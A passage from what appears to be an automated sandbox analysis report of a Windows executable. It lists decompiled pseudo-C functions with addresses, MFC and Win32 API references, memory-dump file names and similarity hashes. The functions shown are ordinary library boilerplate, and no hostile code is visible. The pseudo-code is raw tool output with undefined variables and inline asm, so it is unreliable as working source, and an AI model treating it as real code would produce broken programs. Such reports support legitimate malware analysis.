				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				L00425DFC();
				 *(_t30 - 4) =  *(_t30 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return _t19;
			}

0x0040d650
0x0040d655
0x0040d656
0x0040d65a
0x0040d660
0x0040d663
0x0040d664
0x0040d66b
0x0040d670
0x0040d676
0x0040d679
0x0040d67a
0x0040d67e
0x0040d689
0x0040d68d
0x0040d692
0x0040d699
0x0040d69e
0x0040d6a5
0x0040d6ae
0x0040d6b6

APIs

_EH_prolog.MSVCRT ref: 0040D650
#535.MFC42(?), ref: 0040D66B
#535.MFC42(?,?,?), ref: 0040D67E
#800.MFC42(?,?,?), ref: 0040D699
#800.MFC42(?,?,?), ref: 0040D6A5

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #535#800$H_prolog
String ID:
API String ID: 4207097063-0
Opcode ID: 5f8e5833444c85771c231129dd361a8e030712bf76b6cbc8c9f7f2b4caff0417
Instruction ID: a794431daa8ee12737c26265ff04bdada76dcd12f9c8a2508d48cf22b5aeeccf
Opcode Fuzzy Hash: 5f8e5833444c85771c231129dd361a8e030712bf76b6cbc8c9f7f2b4caff0417
Instruction Fuzzy Hash: 360181B1A11158EFCB04EF55D506BEDBBB8EB15328F10815FE416632C2CBB86B04C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 004010CD, Relevance: 7.5, APIs: 5, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E004010CD(intOrPtr __ecx) {
				void* _t24;

				L004269E6();
				_push(__ecx);
				_push( *((intOrPtr*)(_t24 + 8)));
				 *((intOrPtr*)(_t24 - 0x10)) = __ecx;
				_push(0x88);
				L00426408();
				 *(_t24 - 4) =  *(_t24 - 4) & 0x00000000;
				L004260F6();
				 *((intOrPtr*)(__ecx + 0x60)) = 0x42ced0;
				 *(_t24 - 4) = 1;
				L00425E08();
				_push(0x442178);
				 *(_t24 - 4) = 2;
				 *((intOrPtr*)(__ecx)) = 0x42d568;
				L004261A4();
				 *[fs:0x0] =  *((intOrPtr*)(_t24 - 0xc));
				return __ecx;
			}

0x0040e25a
0x0040e25f
0x0040e262
0x0040e267
0x0040e26a
0x0040e26f
0x0040e274
0x0040e27d
0x0040e282
0x0040e28e
0x0040e294
0x0040e299
0x0040e2a0
0x0040e2a4
0x0040e2aa
0x0040e2b6
0x0040e2be

APIs

_EH_prolog.MSVCRT ref: 0040E25A
#324.MFC42(00000088,?), ref: 0040E26F
#567.MFC42(00000088,?), ref: 0040E27D
#540.MFC42(00000088,?), ref: 0040E294
#860.MFC42(00442178,00000088,?), ref: 0040E2AA

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #324#540#567#860H_prolog
String ID:
API String ID: 2764915820-0
Opcode ID: 50cdc1909ffbdc76211a4eb6ac8206d62f18efc31df1de870a3527d84b3b363c
Instruction ID: 36ae46193996c9f38daccfa7e8cb247b3d041299478e649d6a7a8b04f55d7813
Opcode Fuzzy Hash: 50cdc1909ffbdc76211a4eb6ac8206d62f18efc31df1de870a3527d84b3b363c
Instruction Fuzzy Hash: 6DF0F671B003609BCB10EB5595017AEBB65EFC1348F91801FF44167382CBFC1A00D7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0042155C, Relevance: 7.5, APIs: 5, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0042155C(void* __ecx) {
				signed int _t29;
				void* _t31;

				L004269E6();
				 *(_t31 - 0x14) =  *(_t31 - 0x14) & 0x00000000;
				L00425E08();
				_t29 = 1;
				_push(_t31 - 0x10);
				 *(_t31 - 4) = _t29;
				L00426246();
				_push(_t31 - 0x10);
				L0042611A();
				 *(_t31 - 0x14) = _t29;
				 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t31 - 0xc));
				return  *((intOrPtr*)(_t31 + 8));
			}

0x00421561
0x00421568
0x00421573
0x0042157d
0x00421581
0x00421582
0x00421585
0x00421590
0x00421591
0x00421596
0x00421599
0x004215a0
0x004215ad
0x004215b5

APIs

_EH_prolog.MSVCRT ref: 00421561
#540.MFC42 ref: 00421573
#3874.MFC42(?), ref: 00421585
#535.MFC42(?,?), ref: 00421591
#800.MFC42(?,?), ref: 004215A0

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #3874#535#540#800H_prolog
String ID:
API String ID: 2906513136-0
Opcode ID: 80e998cf6b24fb73344748ee201b2523a69a5ec55c6dd00535a2ce3431179f99
Instruction ID: 4f30c8eb7d45269bdcaa9cc661f6eab50882e69283bd4e23f709bf66986150c7
Opcode Fuzzy Hash: 80e998cf6b24fb73344748ee201b2523a69a5ec55c6dd00535a2ce3431179f99
Instruction Fuzzy Hash: 32F01D72A20129ABCB04EF95D952BEEB778EF44318F50441FF411A7181DBB8AA04CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402018, Relevance: 7.5, APIs: 5, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00402018(void* __ecx) {
				void* _t20;

				L004269E6();
				L00425E08();
				 *(_t20 - 4) =  *(_t20 - 4) & 0x00000000;
				_push(0x8050);
				L00425E02();
				_push( *((intOrPtr*)(_t20 - 0x10)));
				L00426120();
				 *(_t20 - 4) =  *(_t20 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t20 - 0xc));
				return E004282E1;
			}

0x0040ad96
0x0040ada2
0x0040ada7
0x0040adab
0x0040adb3
0x0040adb8
0x0040adbd
0x0040adc2
0x0040adc9
0x0040add2
0x0040adda

APIs

_EH_prolog.MSVCRT ref: 0040AD96
#540.MFC42 ref: 0040ADA2
#4160.MFC42(00008050), ref: 0040ADB3
#6199.MFC42(?,00008050), ref: 0040ADBD
#800.MFC42(?,00008050), ref: 0040ADC9

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #4160#540#6199#800H_prolog
String ID:
API String ID: 3166701186-0
Opcode ID: 01d78a5b742eecf39d12362b125a01053dc67575be88033d4ecc53d65049381c
Instruction ID: 19393b35cb8eaa82ef8ac007b9a5b54f9826cf36f9be3c00c642ee5d1d14926f
Opcode Fuzzy Hash: 01d78a5b742eecf39d12362b125a01053dc67575be88033d4ecc53d65049381c
Instruction Fuzzy Hash: 7BE06D31A209359BCB09EB55D802AFEB370BF00318F91466FA022325E28FB85A04CA58

Uniqueness

Uniqueness Score: -1.00%

Function 0041B74F, Relevance: 6.1, APIs: 4, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0041B74F(signed int _a4, signed int _a8) {
				void* _v8;
				unsigned int _v12;
				void* _t46;
				signed int _t47;
				signed int _t48;
				void* _t50;
				void* _t53;
				void* _t58;
				void* _t64;
				void* _t66;
				unsigned int _t68;
				signed int _t69;
				signed int _t79;
				signed int _t85;
				signed int _t86;
				signed int _t92;
				signed int _t93;
				void* _t96;
				signed int _t99;
				void* _t100;
				signed int _t111;
				void* _t112;
				signed int _t116;
				void* _t117;
				signed int _t118;

				_push(_t66);
				_push(_t66);
				_t46 = _a8;
				_t64 = _t66;
				if(_t46 != 0xffffffff) {
					 *(_t64 + 0x10) = _t46;
				}
				_t116 = _a4;
				if(_t116 != 0) {
					_t92 =  *(_t64 + 4);
					if(_t92 != 0) {
						_t99 =  *(_t64 + 0xc);
						if(_t116 > _t99) {
							_t47 =  *(_t64 + 0x10);
							if(_t47 == 0) {
								asm("cdq");
								_t79 = 8;
								_t47 =  *(_t64 + 8) / _t79;
								if(_t47 >= 4) {
									if(_t47 > 0x400) {
										_t47 = 0x400;
									}
								} else {
									_t47 = 4;
								}
							}
							_t48 = _t47 + _t99;
							_a8 = _t48;
							if(_t116 >= _t48) {
								_a8 = _t116;
							}
							_t50 = _a8 << 2;
							_push(_t50);
							L00425E38();
							_t100 = _t50;
							_t117 =  *(_t64 + 4);
							_t68 =  *(_t64 + 8) << 2;
							_v12 = _t68;
							_t93 = _t68;
							_t69 = _t68 >> 2;
							_v8 = _t100;
							_push( *(_t64 + 4));
							memcpy(_t100, _t117, _t69 << 2);
							_t53 = memcpy(_t117 + _t69 + _t69, _t117, _t93 & 0x00000003);
							_t118 = _a4;
							memset(_v8 + _t93, 0, _t118 - _t53 << 2);
							L00425DF0();
							 *(_t64 + 4) = _v8;
							_t58 = _a8;
							 *(_t64 + 8) = _t118;
							 *(_t64 + 0xc) = _t58;
							L20:
							return _t58;
						}
						_t58 =  *(_t64 + 8);
						if(_t116 > _t58) {
							_t58 = memset(_t92 + _t58 * 4, 0, _t116 - _t58 << 2);
						}
						L8:
						 *(_t64 + 8) = _t116;
						goto L20;
					}
					_t111 = _t116 << 2;
					_push(_t111);
					L00425E38();
					_t96 = _t46;
					_t85 = _t111;
					 *(_t64 + 4) = _t96;
					_t112 = _t96;
					 *(_t64 + 0xc) = _t116;
					_t86 = _t85 >> 2;
					_t58 = memset(_t112 + _t86, memset(_t112, 0, _t86 << 2), (_t85 & 0x00000003) << 0);
					goto L8;
				}
				_t58 =  *(_t64 + 4);
				if(_t58 != 0) {
					_push(_t58);
					L00425DF0();
					 *(_t64 + 4) =  *(_t64 + 4) & _t116;
				}
				 *(_t64 + 0xc) =  *(_t64 + 0xc) & 0x00000000;
				 *(_t64 + 8) =  *(_t64 + 8) & 0x00000000;
				goto L20;
			}

0x0041b752
0x0041b753
0x0041b754
0x0041b75d
0x0041b75f
0x0041b761
0x0041b761
0x0041b764
0x0041b769
0x0041b789
0x0041b78e
0x0041b7c0
0x0041b7c5
0x0041b7db
0x0041b7e0
0x0041b7e7
0x0041b7e8
0x0041b7e9
0x0041b7ee
0x0041b7fc
0x0041b7fe
0x0041b7fe
0x0041b7f0
0x0041b7f2
0x0041b7f2
0x0041b7ee
0x0041b800
0x0041b804
0x0041b807
0x0041b809
0x0041b809
0x0041b80f
0x0041b812
0x0041b813
0x0041b818
0x0041b81d
0x0041b822
0x0041b825
0x0041b828
0x0041b82a
0x0041b82d
0x0041b830
0x0041b833
0x0041b83a
0x0041b83c
0x0041b84d
0x0041b84f
0x0041b858
0x0041b85b
0x0041b85f
0x0041b862
0x0041b865
0x0041b869
0x0041b869
0x0041b7c7
0x0041b7cc
0x0041b7d7
0x0041b7d7
0x0041b7b8
0x0041b7b8
0x00000000
0x0041b7b8
0x0041b792
0x0041b795
0x0041b796
0x0041b79c
0x0041b79e
0x0041b7a0
0x0041b7a3
0x0041b7a9
0x0041b7ac
0x0041b7b6
0x00000000
0x0041b7b6
0x0041b76b
0x0041b770
0x0041b772
0x0041b773
0x0041b778
0x0041b77b
0x0041b77c
0x0041b780
0x00000000

APIs

#825.MFC42(?), ref: 0041B773
#823.MFC42(?), ref: 0041B796
#823.MFC42(?), ref: 0041B813
#825.MFC42(?,?), ref: 0041B84F

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #823#825
String ID:
API String ID: 89657779-0
Opcode ID: cba48d0ad07b07430775a6d8f14030ed4114a0bf6d6a75064b5912fb77e01f45
Instruction ID: ae0b5427874dae67b522faa3cf221574fdec97d68c2ab767598afe0a24d09ccf
Opcode Fuzzy Hash: cba48d0ad07b07430775a6d8f14030ed4114a0bf6d6a75064b5912fb77e01f45
Instruction Fuzzy Hash: 2941E232B00514DBCF18DE29C4815AAB7E6EB88760B59C06EE919DF385DB38DD41CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 0041D3D6, Relevance: 6.1, APIs: 4, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041D3D6(signed int _a4, signed int _a8) {
				void* _v8;
				unsigned int _v12;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				void* _t46;
				signed int _t56;
				signed int _t60;
				void* _t62;
				void* _t64;
				unsigned int _t68;
				signed int _t69;
				signed int _t76;
				signed int _t85;
				void* _t86;
				signed int _t93;
				void* _t94;
				signed int _t95;

				_push(_t64);
				_push(_t64);
				_t42 = _a8;
				_t62 = _t64;
				if(_t42 != 0xffffffff) {
					 *(_t62 + 0x10) = _t42;
				}
				_t93 = _a4;
				if(_t93 != 0) {
					_t65 =  *(_t62 + 4);
					if( *(_t62 + 4) != 0) {
						_t85 =  *(_t62 + 0xc);
						if(_t93 > _t85) {
							_t43 =  *(_t62 + 0x10);
							if(_t43 == 0) {
								asm("cdq");
								_t76 = 8;
								_t43 =  *(_t62 + 8) / _t76;
								if(_t43 >= 4) {
									if(_t43 > 0x400) {
										_t43 = 0x400;
									}
								} else {
									_t43 = 4;
								}
							}
							_t44 = _t43 + _t85;
							_a8 = _t44;
							if(_t93 >= _t44) {
								_a8 = _t93;
							}
							_t46 = _a8 << 3;
							_push(_t46);
							L00425E38();
							_t94 =  *(_t62 + 4);
							_t68 =  *(_t62 + 8) << 3;
							_t86 = _t46;
							_v12 = _t68;
							_v8 = _t86;
							_t69 = _t68 >> 2;
							memcpy(_t94 + _t69 + _t69, _t94, memcpy(_t86, _t94, _t69 << 2) & 0x00000003);
							_t95 = _a4;
							L004020B3(_v8 + _v12, _t95 -  *(_t62 + 8));
							_push( *(_t62 + 4));
							L00425DF0();
							 *(_t62 + 4) = _v8;
							_t56 = _a8;
							 *(_t62 + 8) = _t95;
							 *(_t62 + 0xc) = _t56;
							L20:
							return _t56;
						}
						_t56 =  *(_t62 + 8);
						if(_t93 > _t56) {
							_t56 = L004020B3(_t65 + _t56 * 8, _t93 - _t56);
						}
						L8:
						 *(_t62 + 8) = _t93;
						goto L20;
					}
					_t60 = _t93 << 3;
					_push(_t60);
					L00425E38();
					 *(_t62 + 4) = _t60;
					_t56 = L004020B3(_t60, _t93);
					 *(_t62 + 0xc) = _t93;
					goto L8;
				}
				_t56 =  *(_t62 + 4);
				if(_t56 != 0) {
					_push(_t56);
					L00425DF0();
					 *(_t62 + 4) =  *(_t62 + 4) & _t93;
				}
				 *(_t62 + 0xc) =  *(_t62 + 0xc) & 0x00000000;
				 *(_t62 + 8) =  *(_t62 + 8) & 0x00000000;
				goto L20;
			}

0x0041d3d9
0x0041d3da
0x0041d3db
0x0041d3e4
0x0041d3e6
0x0041d3e8
0x0041d3e8
0x0041d3eb
0x0041d3f0
0x0041d410
0x0041d415
0x0041d438
0x0041d43d
0x0041d456
0x0041d45b
0x0041d462
0x0041d463
0x0041d464
0x0041d469
0x0041d477
0x0041d479
0x0041d479
0x0041d46b
0x0041d46d
0x0041d46d
0x0041d469
0x0041d47b
0x0041d47f
0x0041d482
0x0041d484
0x0041d484
0x0041d48a
0x0041d48d
0x0041d48e
0x0041d497
0x0041d49c
0x0041d49f
0x0041d4a1
0x0041d4a6
0x0041d4a9
0x0041d4b3
0x0041d4b5
0x0041d4c6
0x0041d4cb
0x0041d4ce
0x0041d4d7
0x0041d4da
0x0041d4dd
0x0041d4e0
0x0041d4e3
0x0041d4e7
0x0041d4e7
0x0041d43f
0x0041d444
0x0041d44f
0x0041d44f
0x0041d430
0x0041d430
0x00000000
0x0041d430
0x0041d419
0x0041d41c
0x0041d41d
0x0041d423
0x0041d428
0x0041d42d
0x00000000
0x0041d42d
0x0041d3f2
0x0041d3f7
0x0041d3f9
0x0041d3fa
0x0041d3ff
0x0041d402
0x0041d403
0x0041d407
0x00000000

APIs

#825.MFC42(?), ref: 0041D3FA
#823.MFC42(?), ref: 0041D41D
#823.MFC42(?), ref: 0041D48E
#825.MFC42(?,?,?), ref: 0041D4CE

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #823#825
String ID:
API String ID: 89657779-0
Opcode ID: 33516ba89fbdfc4753ca134a05159b3c828d6c78b418fa4631469c0889a7ae8e
Instruction ID: f57a12143ba35cd615fbdc5d9418eba5d37c9aa01496556d3ce096a8f7fc6caf
Opcode Fuzzy Hash: 33516ba89fbdfc4753ca134a05159b3c828d6c78b418fa4631469c0889a7ae8e
Instruction Fuzzy Hash: 0A31C2B1B00114ABCF14DF28D5816AAB7A4EF44364B54C06AF909DF346C678ED41CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00410399, Relevance: 6.1, APIs: 4, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00410399(void* __ecx, RECT* _a4, intOrPtr _a8) {
				struct tagRECT _v20;
				intOrPtr _t36;
				signed char _t39;
				intOrPtr _t42;
				intOrPtr _t44;
				void* _t45;
				intOrPtr _t47;

				_t45 = __ecx;
				CopyRect( &_v20, _a4);
				_push(3);
				_push(3);
				_push(5);
				_push(3);
				L004264CE();
				if(_a8 != 0xe81f) {
					_push(2);
					_push(2);
					_push(0);
					_push(2);
					L004264CE();
				}
				_t36 = _a8 - 0xe81b;
				if(_t36 == 0) {
					 *(_t45 + 0x7c) =  *(_t45 + 0x7c) | 0x00000008;
				} else {
					_t36 = _t36 - 1;
					if(_t36 == 0) {
						 *(_t45 + 0x7c) =  *(_t45 + 0x7c) | 0x00000002;
					} else {
						_t36 = _t36 - 1;
						if(_t36 == 0) {
							 *(_t45 + 0x7c) =  *(_t45 + 0x7c) | 0x00000001;
						} else {
							_t36 = _t36 - 1;
							if(_t36 == 0) {
								 *(_t45 + 0x7c) =  *(_t45 + 0x7c) | 0x00000004;
							}
						}
					}
				}
				_t39 =  *(_t45 + 0x7c);
				if((_t39 & 0x00000010) != 0) {
					if((_t39 & 0x00000008) == 0) {
						_t44 = 0;
					} else {
						_t44 =  *((intOrPtr*)(_t45 + 0xe8));
					}
					if((_t39 & 0x00000002) == 0) {
						_t42 = 0;
					} else {
						_t42 =  *((intOrPtr*)(_t45 + 0xe8));
					}
					if((_t39 & 0x00000004) == 0) {
						_t36 = 0;
					} else {
						_t36 =  *((intOrPtr*)(_t45 + 0xe8));
					}
					if((_t39 & 0x00000001) == 0) {
						_t47 = 0;
					} else {
						_t47 =  *((intOrPtr*)(_t45 + 0xe8));
					}
					_push(_t44);
					_push(_t42);
					_push(_t36);
					_push(_t47);
					L004264CE();
				}
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return _t36;
			}

0x004103a7
0x004103aa
0x004103b0
0x004103b2
0x004103b4
0x004103b6
0x004103bb
0x004103c7
0x004103c9
0x004103cb
0x004103cd
0x004103cf
0x004103d4
0x004103d4
0x004103dc
0x004103e1
0x004103fe
0x004103e3
0x004103e3
0x004103e4
0x004103f8
0x004103e6
0x004103e6
0x004103e7
0x004103f2
0x004103e9
0x004103e9
0x004103ea
0x004103ec
0x004103ec
0x004103ea
0x004103e7
0x004103e4
0x00410402
0x00410408
0x0041040d
0x00410417
0x0041040f
0x0041040f
0x0041040f
0x0041041c
0x00410426
0x0041041e
0x0041041e
0x0041041e
0x0041042b
0x00410435
0x0041042d
0x0041042d
0x0041042d
0x0041043a
0x00410444
0x0041043c
0x0041043c
0x0041043c
0x00410446
0x00410447
0x00410448
0x00410449
0x0041044d
0x0041044d
0x00410458
0x00410459
0x0041045a
0x0041045b
0x0041045f

APIs

CopyRect.USER32 ref: 004103AA
#2380.MFC42(00000003,00000005,00000003,00000003), ref: 004103BB
#2380.MFC42(00000002,00000000,00000002,00000002,00000003,00000005,00000003,00000003), ref: 004103D4
#2380.MFC42(00000000,00000000,00000000,00000000), ref: 0041044D

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2380$CopyRect
String ID:
API String ID: 1388795460-0
Opcode ID: 9fefbae1d41b615c81d1dc20250fa85c172b49b67d6e10d4718904fb34becc7e
Instruction ID: 89ddb0dffe47ec530427cf0d4d0de4678e75f261b5002cddb3eccbd48819c011
Opcode Fuzzy Hash: 9fefbae1d41b615c81d1dc20250fa85c172b49b67d6e10d4718904fb34becc7e
Instruction Fuzzy Hash: FF21F830100A59DFD725CA14C85BBFB77A4FF40304F40880AEB6B6A1D2D6B8ADC6CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004152DE, Relevance: 6.1, APIs: 4, Instructions: 52
stringCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E004152DE(intOrPtr __ecx, CHAR* _a4, CHAR* _a8, intOrPtr _a12) {
				intOrPtr _v8;
				void* _v20;
				void* __ebp;
				void* _t13;
				void* _t25;
				void* _t27;
				void* _t37;
				void* _t39;
				void* _t40;

				_t29 = __ecx;
				_push(__ecx);
				_t27 = 0;
				_v8 = __ecx;
				if(_a8 != 0) {
					_t39 = lstrlenA(_a8) + 1;
					E004269B0(_t39 + _t39 + 0x00000003 & 0x000000fc, _t29);
					_t25 = _t40;
					_push(_t39);
					_push(_a8);
					_push(_t25);
					L004265EE();
					_t27 = _t25;
				}
				_t13 = 0;
				if(_a4 != 0) {
					_t37 = lstrlenA(_a4) + 1;
					E004269B0(_t37 + _t37 + 0x00000003 & 0x000000fc, _t29);
					_t13 = _t40;
					_push(_t37);
					_push(_a4);
					_push(_t13);
					L004265EE();
				}
				_push(_a12);
				_push(_t27);
				_push(_t13);
				return L0040122B(_v8);
			}

0x004152de
0x004152e1
0x004152e3
0x004152f0
0x004152f3
0x004152fc
0x00415305
0x0041530a
0x0041530c
0x0041530d
0x00415310
0x00415311
0x00415316
0x00415316
0x00415318
0x0041531d
0x00415326
0x0041532f
0x00415334
0x00415336
0x00415337
0x0041533a
0x0041533b
0x0041533b
0x00415340
0x00415346
0x00415347
0x00415354

APIs

lstrlenA.KERNEL32(?), ref: 004152F8
#1099.MFC42(?,?,00000001), ref: 00415311
lstrlenA.KERNEL32(?), ref: 00415322
#1099.MFC42(?,?,00000001), ref: 0041533B

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
